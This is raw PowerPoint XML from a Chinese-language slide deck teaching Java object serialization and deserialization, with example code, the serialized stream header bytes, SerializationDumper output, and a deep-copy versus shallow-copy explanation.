              <a:t>        User user = new User("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>zcsz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>, 18</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        try {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>            FileOutputStream fos = new FileOutputStream("./user.ser");</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>  //文件输出流</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>向指定文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>("./user.ser")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>中写入字节</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>            ObjectOutputStream os = new ObjectOutputStream(fos);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>            os.writeObject(user);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对象输入流，将 User 对象序列化为字节流并写入文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>            FileInputStream fis = new FileInputStream("./user.ser");</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t> //创建一个 FileInputStream，用于从 user.ser 文件中读取字节</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>            ObjectInputStream oi = new ObjectInputStream(fis);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t> //通过 ObjectInputStream 将字节流反序列化为 User 对象</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>            User user1 = (User)oi.readObject();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>            user1.info();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        } catch (FileNotFoundException e) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>            e.printStackTrace();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        } catch (IOException e) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>            e.printStackTrace();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        catch (ClassNotFoundException e) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>            e.printStackTrace();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>        }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>}</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反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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83515" y="1195070"/>
            <a:ext cx="11393170" cy="5120005"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在刚才的例子中展示了序列化和反序列化的过程，用工具打开序列化后的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>user.ser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件可以看到如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内容：</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在换成别序列化文件之后在打开可以看到如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内容：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="954405" y="1598295"/>
            <a:ext cx="9220200" cy="2305050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="992505" y="4335780"/>
            <a:ext cx="9182100" cy="2295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反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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270510" y="1194435"/>
            <a:ext cx="11306175" cy="507365"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在通过SerializationDumper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(序列化转储器)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>工具进行转储解析之后出现如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内容：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="278765" y="1593215"/>
            <a:ext cx="5534025" cy="3020060"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5805805" y="3387090"/>
            <a:ext cx="6078855" cy="2927350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="文本框 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5930900" y="1701800"/>
            <a:ext cx="5953125" cy="1489075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址：https://github.com/NickstaDB/SerializationDumper</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反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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270510" y="1194435"/>
            <a:ext cx="11529060" cy="5197475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过不同的序列化文件可以看出前四个字节具有一定的规则性。那么根据查找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>官网中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JDK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对相关文献可以看到描述</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如下：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>第一部分是序列化文件头</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>标志位</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>ed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：STREAM_MAGIC声明使用了序列化协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>魔数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>00 05：STREAM_VERSION序列化协议版本</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>73：TC_OBJECT声明这是一个新的对象</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="347980" y="2908300"/>
            <a:ext cx="5915025" cy="3277870"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7115810" y="1783080"/>
            <a:ext cx="3863340" cy="4403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反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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270510" y="1195070"/>
            <a:ext cx="5908040" cy="5436235"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>序列化前和序列化后对象的地址与原来的是否相同？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>public class Serialize implements Serializable{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>    private static final long serialVersionUID = -5211389707739541364L;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>    public int num = 1390;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>    public void checkIsSame()</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>    {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1"/>
              <a:t> Serialize serialize1 = new Serialize();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>        try {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>            FileOutputStream fos = new FileOutputStream("serialize.obj");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>            ObjectOutputStream oos = new ObjectOutputStream(fos);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>            oos.writeObject(serialize1);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>            System.out.println("序列化结束");}catch (IOException e){e.printStackTrace();}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>        Serialize serialize2 = null;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>        try {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>            FileInputStream fis = new FileInputStream("serialize.obj");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>            ObjectInputStream ois = new ObjectInputStream(fis);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1"/>
              <a:t>serialize2 = (Serialize) ois.readObject();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>             System.out.println("反序列化结束");}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>        catch (ClassNotFoundException | IOException e){ e.printStackTrace();}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1"/>
              <a:t> System.out.println("序列化和反序列化的对象相同否？"+(serialize1==serialize2));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>    public static void main(String[] args) </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>    {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>        Serialize serialize = new Serialize();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>        serialize.checkIsSame();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6177915" y="1582420"/>
            <a:ext cx="5784215" cy="4661535"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>结果：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>序列化结束</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>反序列化结束</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>序列化和反序列化的对象相同否？</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>false</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>原因：序列化前后对象的地址不同了，但是内容是一样的，而且对象中包含的引用也相同。也就是说序列化是一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>深拷贝</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的操作，序列化前和序列化后是两个独立的对象。</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反序列化</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </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270510" y="1195070"/>
            <a:ext cx="11393170" cy="3152775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>什么是深拷贝什么是浅</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>拷贝？</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>浅</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>拷贝：创建一个新对象，但对于原对象中的引用类型属性，新对象和原对象共享同一内存地址。如果修改了其中一个对象的引用类型属性，另一个对象也会受到影响。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>深</a:t>
            </a:r>
            <a:r>
